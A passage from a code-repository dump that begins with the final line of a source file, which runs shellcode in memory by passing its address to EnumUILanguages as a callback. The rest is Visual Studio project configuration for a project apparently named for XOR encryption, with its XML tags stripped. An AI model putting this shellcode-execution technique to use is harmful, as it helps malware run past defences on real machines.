    EnumUILanguages((UILANGUAGE_ENUMPROC)addrShellcode, 0, 0);
}
--------------------------------------------------------------------------------
/xor加密/xor加密.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {f6e80e9f-0333-4af4-8bbd-e9b6c2a8a4b9}
25 | xor加密
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
78 | true
79 |
80 |
81 | Console
82 | true
83 |
84 |
85 |
86 |
87 | Level3
88 | true
89 | true
90 | true
91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | true
93 |
94 |
95 | Console
96 | true
97 | true
98 | true
99 |
100 |
101 |
102 |
103 | Level3
104 | true
105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
106 | true
107 |
108 |
109 | Console
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | true
118 | true
119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
120 | true
121 |
122 |
123 | Console
124 | true
125 | true
126 | true
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
--------------------------------------------------------------------------------
/xor加密/xor加密.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | 源文件
20 |
21 |
22 |
--------------------------------------------------------------------------------
/xor加密/xor加密.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------